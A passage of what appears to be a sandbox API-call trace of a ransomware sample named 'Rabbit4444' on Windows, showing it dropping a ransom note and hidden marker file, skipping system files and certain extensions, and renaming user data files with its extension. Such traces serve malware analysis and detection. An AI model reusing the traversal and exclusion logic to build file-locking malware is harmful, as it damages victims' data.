(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.474] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.475] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.475] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.475] CloseHandle (hObject=0x2cc) returned 1 [0065.475] CloseHandle (hObject=0x2a0) returned 1 [0065.475] GetCurrentThreadId () returned 0xd98 [0065.475] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0065.475] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData" [0065.475] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122900 | out: hHeap=0xe0000) returned 1 [0065.475] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0065.475] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData" [0065.475] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\" [0065.475] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0065.475] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.477] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.480] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.481] CloseHandle (hObject=0x2a0) returned 1 [0065.481] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData") returned 91 [0065.481] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.481] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8930d8, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xec8930d8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0065.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.482] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.482] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.482] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.482] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec8930d8, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xec8930d8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.482] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.482] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.482] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.482] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.482] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.482] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0594f9d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0594f9d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.482] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.482] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.482] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0594f9d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0594f9d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0594f9d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.482] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0065.482] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.483] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.483] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.483] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.483] CloseHandle (hObject=0x2cc) returned 1 [0065.483] CloseHandle (hObject=0x2a0) returned 1 [0065.483] GetCurrentThreadId () returned 0xd98 [0065.483] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0065.483] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings" [0065.483] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124250 | out: hHeap=0xe0000) returned 1 [0065.483] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0065.483] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings" [0065.484] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\" [0065.484] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0065.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.486] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.489] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.489] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.489] CloseHandle (hObject=0x2a0) returned 1 [0065.490] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings") returned 86 [0065.490] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.490] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf05bb25d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.490] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.490] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.490] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.490] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.490] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xf05bb25d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.490] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.490] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.490] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.490] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.490] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.490] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf05bb25d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf05bb25d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf05bb25d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.490] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.490] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.490] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1fd05db4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x1fd05db4, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0065.491] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0065.491] lstrcpyW (in: lpString1=0x130ebe6, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0065.491] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0065.492] lstrlenW (lpString="roaming.lock") returned 12 [0065.492] lstrlenW (lpString="Rabbit4444") returned 10 [0065.492] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0065.492] lstrlenW (lpString=".dll") returned 4 [0065.492] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0065.492] lstrlenW (lpString=".lnk") returned 4 [0065.492] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0065.492] lstrlenW (lpString=".ini") returned 4 [0065.492] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0065.492] lstrlenW (lpString=".sys") returned 4 [0065.492] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0065.492] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fd05db4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x36332b5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x32de8aed, ftLastWriteTime.dwHighDateTime=0x1d32756, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0065.492] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0065.492] lstrcpyW (in: lpString1=0x130ebe6, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0065.492] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0065.493] lstrlenW (lpString="settings.dat") returned 12 [0065.493] lstrlenW (lpString="Rabbit4444") returned 10 [0065.493] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0065.493] lstrlenW (lpString=".dll") returned 4 [0065.493] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0065.493] lstrlenW (lpString=".lnk") returned 4 [0065.493] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0065.493] lstrlenW (lpString=".ini") returned 4 [0065.493] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0065.493] lstrlenW (lpString=".sys") returned 4 [0065.493] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0065.493] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0065.493] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0065.493] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15680399423) returned 1 [0065.493] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0065.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0065.493] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0065.493] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x27c [0065.495] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0065.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11ddb8 [0065.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0065.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0065.497] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11ddb8 [0065.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0065.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11ddb8 | out: hHeap=0xe0000) returned 1 [0065.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0065.497] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15680783578) returned 1 [0065.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0065.497] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0065.497] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.497] CloseHandle (hObject=0x27c) returned 1 [0065.499] CloseHandle (hObject=0x2cc) returned 1 [0065.499] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 110 [0065.499] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0065.499] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2aa792ec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2aa792ec, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2aa792ec, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0065.499] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.499] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.499] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0065.499] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0065.499] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0065.499] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0065.500] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0065.500] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0065.500] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0065.500] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0065.500] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0065.500] lstrcpyW (in: lpString1=0x130ebe6, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0065.500] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0065.500] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0065.500] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0065.500] lstrlenW (lpString="Rabbit4444") returned 10 [0065.500] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0065.500] lstrlenW (lpString=".dll") returned 4 [0065.500] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0065.500] lstrlenW (lpString=".lnk") returned 4 [0065.500] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0065.500] lstrlenW (lpString=".ini") returned 4 [0065.500] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0065.500] lstrlenW (lpString=".sys") returned 4 [0065.500] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0065.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\settings\\settings.dat.log1"), 